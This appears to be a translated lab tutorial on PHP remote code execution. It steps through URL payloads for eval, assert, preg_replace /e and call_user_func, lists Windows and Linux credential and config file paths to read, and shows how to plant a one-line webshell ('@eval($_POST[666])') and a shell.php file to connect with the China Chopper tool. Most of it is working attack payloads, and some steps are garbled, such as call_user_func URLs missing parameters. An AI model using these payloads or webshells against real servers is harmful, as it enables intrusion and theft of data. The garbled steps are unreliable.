1. Remote command
In PHP, the functions that allow command execution are
1、array_map()
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/3.php
2. Splice "?arr=print_r" after the URL, visit http://ip/os/3.php?arr=print_r, and print the array
print_r is a function that specifically prints data content
3. Add "?arr=phpinfo" after the URL, visit http://ip/os/3.php?arr=phpinfo, and check the execution effect
2、eval()
The meaning of this code: determine whether the user has entered a, and if so, execute it as a PHP statement
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/eval.php
2. Splice "?a=echo 'This is test';" after the URL, visit http://ip/os/eval.php?a=echo 'This is test';, and execute the code
3. Splice "?a=phpinfo();" after the URL, visit http://ip/os/eval.php?a=phpinfo();, and check the execution effect
3. assert(): the function is similar to eval(), but the two are different
eval is a language constructor, not a function, and cannot be called by variable functions;
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php
2. Splice "?a=var_dump(array(1,2,3)) after the URL, visit http://ip/os/assert.php?a=var_dump(array(1,2,3)), execute the code
3. Splice "?a=phpinfo();" after the URL, visit http://ip/os/assert.php?a=phpinfo() to check the execution effect
4、preg_replace()
Preg_replace("/(.*)/e",'\\1',$_GET['a']);
/(.*)/e represents the pattern to be replaced
'\\1' represents the first captured text replacement
Preg_replace("/(.*)/e",'\\1',$_GET['a']); with Preg_replace("/[(.*)]/e",'\\1',$_GET ['a']); The difference is
Need to add [ ] to the input string
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/preg_replace.php
2. Splice "?a=var_dump(array(1,2,3)) after the URL, visit http://ip/os/preg_replace.php?a=var_dump(array(1,2,3)), execute the code
3. Splice "?a=phpinfo();" after the URL, visit http://ip/os/preg_replace.php?a=phpinfo() to check the execution effect
5、call_user_func()
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/call_user_func.php
2. Splice "?a=assert&b=var_dump(array(1,2,3)) after the URL, visit http://ip/os/call_user_func.php?a=var_dump(array(1,2,3)) , execute the code
3. Splice "?a=assert&b=phpinfo()" after the URL, visit http://ip/os/call_user_func.php?a=assert&b=phpinfo(), and check the execution effect
6. $a($b): similar to the usage of call_user_func()
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/kbhs.php
2. Splice "?a=assert&b=var_dump(array(1,2,3)) after the URL, visit http://ip/os/kbhs.php?a=var_dump(array(1,2,3)) , execute the code
3. Splice "?a=assert&b=phpinfo()" after the URL, visit http://ip/os/kbhs.php?a=assert&b=phpinfo(), and check the execution effect
2. Exploitation of Remote Command Execution Vulnerabilities
1. Remote Command Execution Vulnerability Exploitation Using PHP Magic Constants to Obtain Information
principle:
If a remote command execution vulnerability is detected on the website, relevant information can be obtained by using PHP magic constants.
PHP provides a large number of predefined constants to any script it runs. However, many constants are defined by different extension libraries, and will only appear when these extension libraries are loaded, or after dynamic loading, or included at compile time. There are eight magic constants whose value changes depending on their position in the code.
__LINE__ 文件中的当前行号
__FILE__ 文件的完整路径和文件名。如果用在被包含文件中,则返回被包含的文件名
__DIR__ 文件所在的目录。如果用在被包括文件中,则返回被包括的文件所在的目录
__FUNCTION__ 该常量所在的函数名称(PHP 4.3.0 新加)。自PHP5起本常量返回该函数被定义时的名字(区分大小写)。在PHP4中该值总是小写字母的
__CLASS__ 该类被定义时的名字(PHP 4.3.0 新加)。自PHP5起本常量返回该类被定义时的名字(区分大小写)
__TRAIT__ Trait的名字(PHP 5.4.0 新加)。自PHP5.4.0起,PHP实现了代码复用的一个方法,称为traits
__METHOD__ 类的方法名(PHP 5.0.0 新加)。返回该方法被定义时的名字(区分大小写)
__NAMESPACE__ 当前命名空间的名称(区分大小写)。此常量是在编译时定义的(PHP 5.3.0 新增)1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php
2. Splice "?a=print(__LINE__) after the URL, visit http://ip/os/assert.php?a=print(__LINE__), execute the code, and get the number of lines where the current code is located Note: there are two underscore_
3. Splice "?a=print(__DIR__) after the URL, visit http://ip/os/assert.php?a=print(__DIR__), execute the code, and get the directory where the current file is located
4. Splice "?a=print(__FILE__) after the URL, visit http://ip/os/assert.php?a=print(__FILE__), execute the code, and get the full path of the current file
2. Remote command execution exploit to read files
principle:
The remote command execution vulnerability can be used to read sensitive files of some operating systems to obtain important information.
Windows system sensitive information:
C:\boot.ini //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
C:\windows\repair\sam //windows初次安装的密码
C:\program Files\mysql\my.ini //Mysql配置信息
C:\program Files\mysql\data\mysql\user.MYD //Mysql root C:\windows\php.ini //php配置信息
......
Linux system sensitive information:
/etc/passwd //linux用户信息
/usr/local/app/apache2/conf/httpd.conf //apache2配置文件
/usr/local/app/php5/lib/php.ini //php配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/etc/my.cnf //Mysql配置文件
......1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php
2. Splice "?a=var_dump(file_get_contents('C:\Windows\System32\drivers\etc\hosts'))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_get_contents ('C:\Windows\System32\drivers\etc\hosts')), execute the code and get the hosts file information
hosts is a system file, its function is to establish an association "database" between some commonly used website domain names and their corresponding IP addresses.
3. Splice "?a=var_dump(file_get_contents('C:\Windows\win.ini'))" after the URL, visit http://ip/os/assert.php?a=var_dump(file_get_contents('C: \Windows\win.ini')), execute the code, get win.ini file information
" win.ini is a basic system configuration file of Windows system . The WIN.INI file contains several subsections, each section consists of a group of related settings. The file configuration saves such as the part that affects the Windows operating environment, the control system interface Display forms and positions of windows and mouse, link specific file types with corresponding applications, list options for default size, layout, text color settings, etc. of HELP windows and dialog windows, etc. It is an indispensable file for system configuration.
3. A one-sentence Trojan horse exploiting remote command execution vulnerabilities
principle:
The remote command execution vulnerability can be used to execute a one-sentence Trojan, so that GetShell can connect to a one-sentence Trojan with the help of the WebShell tool.
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php
2. Splice "?a=@eval($_POST[666])" after the URL, visit http://ip/os/assert.php?a=@eval($_POST[666]), execute the code and construct One sentence Trojan horse (Warning warning, but does not affect)
666 is the connection password with the kitchen knife
3. Open the Chinese kitchen knife
4. Right-click the blank space, click "Add" to add the shell address
- The address is: one sentence Trojan horse address and connection password
- Script type: PHP
5. Click "Add", double-click the one-sentence Trojan address
The remote command execution vulnerability is exploited to execute a one-sentence Trojan horse file, thus GetShell.
4. Write shell for remote command execution exploit
Principle: The remote command execution vulnerability can be used to execute the code that writes the file and generate a new script file.
1. Log in to the "Attack" operating machine, open the browser, and visit http://ip/os/assert.php
2. Splice "?a=var_dump(file_put_contents($_POST[1],$_POST[2]))" after the URL,
Visit http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])), and send post data: 1=info.php&2=<?php phpinfo() ;?>, successfully execute the code (Warning warning, but does not affect)
3. Visit http://ip/os/info.php, the newly generated info.php script file is successfully parsed and executed
4. Splice "?a=var_dump(file_put_contents($_POST[1],$_POST[2]))" after the URL,
Visit http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])), and send post data: 1=shell.php&2=<?php @eval( $_POST[666]);?>, successfully execute the code (Warning warning, but does not affect)
5. Visit http://ip/os/shell.php, no error is reported, shell.php one sentence Trojan file is successfully generated
6. Open Chinese Kitchen Knife (Guogou), double-click the exe file
7. Right-click the blank space and click "Add" to add the shell address
- The address is: one sentence Trojan horse address and connection password
- Script type: PHP
8. Click "Add", double-click the one-sentence Trojan address
The remote command execution vulnerability is exploited to execute the generated code file to generate a new script file or a one-sentence Trojan horse file.
That's all for this article